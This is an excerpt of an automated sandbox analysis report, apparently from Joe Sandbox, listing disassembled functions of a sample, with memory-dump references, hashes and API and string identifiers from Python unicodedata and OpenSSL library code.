                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DoubleErr_Float_FromNumericStringSubtypeType_Unicode_
                                                                                                                                                                                                                            • String ID: not a numeric character
                                                                                                                                                                                                                            • API String ID: 1034370217-2058156748
                                                                                                                                                                                                                            • Opcode ID: fcf580e983b79c5798e6cad288af339b3c77563d47c350b9cfeb4f794997e3db
                                                                                                                                                                                                                            • Instruction ID: f45253fe0c7aa9b06bbc3dc8ef984908e992371e028ec597dbdff5b0adbcec72
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcf580e983b79c5798e6cad288af339b3c77563d47c350b9cfeb4f794997e3db
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9217225B0C983C2EB5D8B25E47093967A4AF44B89F9881B1CA7E476DCDF3CEC958740
                                                                                                                                                                                                                            Function 00007FFDFABD4448 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DecimalDigitErr_FromLongLong_StringSubtypeType_Unicode_
                                                                                                                                                                                                                            • String ID: not a decimal
                                                                                                                                                                                                                            • API String ID: 3750391552-3590249192
                                                                                                                                                                                                                            • Opcode ID: 30abf5ee6eb06e173e75edeec379c503cf6988d9432b31e93c7c03d97c2bbd6f
                                                                                                                                                                                                                            • Instruction ID: 52ce85d88039db10713fce9beb222a578ea3aad288ecdd82228b8c17e57cd137
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30abf5ee6eb06e173e75edeec379c503cf6988d9432b31e93c7c03d97c2bbd6f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72114221B0CA4281FB5C8B25E4749396B91AF44B84F8885B4CA6F476DCDF3CE8849740
                                                                                                                                                                                                                            Function 00007FFDFABD4CA4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                            • String ID: a unicode character$argument 1$numeric
                                                                                                                                                                                                                            • API String ID: 3876575403-2385192657
                                                                                                                                                                                                                            • Opcode ID: 047d09c28d14a3fb074898e0464a76a5d15e70b5d1db224d2900275fff384a43
                                                                                                                                                                                                                            • Instruction ID: 0148979b1df3d87e89dc730a653fdb8867d2f5cdd73883a2733ee75dc13d8b44
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 047d09c28d14a3fb074898e0464a76a5d15e70b5d1db224d2900275fff384a43
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4119131B0CA8285EB589B42E460AA96360FB45BC8F9840B6DE3D477DDCF3DD995C300
                                                                                                                                                                                                                            Function 00007FFDFABD4B60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                            • String ID: a unicode character$argument 1$name
                                                                                                                                                                                                                            • API String ID: 3876575403-4190364640
                                                                                                                                                                                                                            • Opcode ID: ec6e6ed6f870309110939f004844dac450691aedb088de06c3465004018691fb
                                                                                                                                                                                                                            • Instruction ID: 3e192051e0a493af1ff311e7ab71aab745d451d04f217d562068a0241c41c607
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec6e6ed6f870309110939f004844dac450691aedb088de06c3465004018691fb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F411C131B08A8281EB189B42E4A0AA97360FB54BC4F9880B6DE2D4779DCF3DE545C300
                                                                                                                                                                                                                            Function 00007FFDFABD4390 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                            • String ID: a unicode character$argument 1$decimal
                                                                                                                                                                                                                            • API String ID: 3876575403-2474051849
                                                                                                                                                                                                                            • Opcode ID: d3484de5ee44d7a33ec5e53d5364025946576caca118cb4f9bd9e3e7fb1b6d42
                                                                                                                                                                                                                            • Instruction ID: d511a67fe0954feae9d9709dd16d4d52a9eeeadf69a8e3172aba17b743304d38
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3484de5ee44d7a33ec5e53d5364025946576caca118cb4f9bd9e3e7fb1b6d42
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E811E331B08A4285EB589F46E460AA92760FB44FC4F8880B2DE2E477DDCF3CD596C700
                                                                                                                                                                                                                            Function 00007FFDFF241E5B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_CTX_set_ct_validation_callback
                                                                                                                                                                                                                            • API String ID: 1552677711-4243395191
                                                                                                                                                                                                                            • Opcode ID: ffaf568c9be36781dfb6411fb204075f8d9e9e6af4da94c1d8eabfdaf436a7cb
                                                                                                                                                                                                                            • Instruction ID: 7f8d9075c6aef4de6a66d707893e051d1ba1128dc7c32e80de10d0a7fbfd5296
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffaf568c9be36781dfb6411fb204075f8d9e9e6af4da94c1d8eabfdaf436a7cb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F701B531B1868141F7449711E550AE99350EF44784F984231FE7CC7BDEDE2CD8414B00
                                                                                                                                                                                                                            Function 00007FFDFABD42A4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_ArgumentErr_Occurred
                                                                                                                                                                                                                            • String ID: a unicode character$argument$combining
                                                                                                                                                                                                                            • API String ID: 3979797681-4202047184
                                                                                                                                                                                                                            • Opcode ID: f57a56bca3f03315399802cbb188705c8f0221a3905f8c719d86b24713be5e96
                                                                                                                                                                                                                            • Instruction ID: 07f56e93260cd066f04908806516d0e87a80a3456c6b1b799941f5dfc1b5ac0d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f57a56bca3f03315399802cbb188705c8f0221a3905f8c719d86b24713be5e96
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10017C60F1CA4381EB2C9B55A8609B822A0FF09764FC406B9D97E572DDDF3CE5958340
                                                                                                                                                                                                                            Function 00007FFDFABD4A6C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_ArgumentErr_Occurred
                                                                                                                                                                                                                            • String ID: a unicode character$argument$mirrored
                                                                                                                                                                                                                            • API String ID: 3979797681-4001128513
                                                                                                                                                                                                                            • Opcode ID: 90d5ae0072a7ca6e879d97d47db35ea336886febc9b0d1b251bdc56bef49b412
                                                                                                                                                                                                                            • Instruction ID: 8d5d1fd8a5f2e43255d89172207a961d040d18810c85cb228ee648ba054819b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90d5ae0072a7ca6e879d97d47db35ea336886febc9b0d1b251bdc56bef49b412
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E018F60F0DA8386EB1C9B11E8609B823A4FF49794FC406B5D97D5B2D9EF3CE5948304
                                                                                                                                                                                                                            Function 00007FFDFF267E80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$RSA$ssl_log_rsa_client_key_exchange
                                                                                                                                                                                                                            • API String ID: 193678381-1475867426
                                                                                                                                                                                                                            • Opcode ID: f25f34968bdcff2f8098303b8c5ba009518d81c069525133a3d8b9fc3598560d
                                                                                                                                                                                                                            • Instruction ID: cf4d56309fbdda14ab5275b6e139f0b9229d336dce22a844b603397f2ad80e18
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f25f34968bdcff2f8098303b8c5ba009518d81c069525133a3d8b9fc3598560d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0F06261F1864285E7509751FC31EEA5740AB95780F844230DD7CC77DBEE2CD6518B00
                                                                                                                                                                                                                            Function 00007FFDFABD2610 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Mem_$Capsule_Err_FreeMallocMemory
                                                                                                                                                                                                                            • String ID: unicodedata._ucnhash_CAPI
                                                                                                                                                                                                                            • API String ID: 3673501854-3989975041
                                                                                                                                                                                                                            • Opcode ID: 04962b3129ec8039d4574c2b15526bc82bf072c2335504b47079f601afa57e40
                                                                                                                                                                                                                            • Instruction ID: 163561a7af23ed99da35b5fad1d8a52185e5d9dd7a4df5adc127fba8848f993e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04962b3129ec8039d4574c2b15526bc82bf072c2335504b47079f601afa57e40
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19F01920B1DB4795EB098B51A87497863A8BF19B81FC815B5CC6E063ECEF3CE044D310
                                                                                                                                                                                                                            Function 00007FFDFF241EBB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_read
                                                                                                                                                                                                                            • API String ID: 1552677711-152370140
                                                                                                                                                                                                                            • Opcode ID: 9f526387a2ec5312fa6aaf9e7fc70be552789ac35b2de73a8e5f36ca7372d6e1
                                                                                                                                                                                                                            • Instruction ID: 75a1dc8c20ad3a0509b6ca865ec39ac2680aa431b6074f7fae3d095f212ebda4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f526387a2ec5312fa6aaf9e7fc70be552789ac35b2de73a8e5f36ca7372d6e1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F0B451F0964247F705B764D862EE963109F81310FD04231E63CC69DFDE2DEA464B10
                                                                                                                                                                                                                            Function 00007FF6029A8908 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                            • Opcode ID: c363bace5bda0f06f40d3f02de499b28d92a603ede12d76f1b185844c60c5271
                                                                                                                                                                                                                            • Instruction ID: b5aee352305c4dbf249c6b6d74961919f0a3851795192f7b1c84ca149870ad73
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c363bace5bda0f06f40d3f02de499b28d92a603ede12d76f1b185844c60c5271
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29F09661F0870681FB108B26E4483395B60FF89BA9F740635C9ADC55F6CFACD449C740
                                                                                                                                                                                                                            Function 00007FFDFF24DE11 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
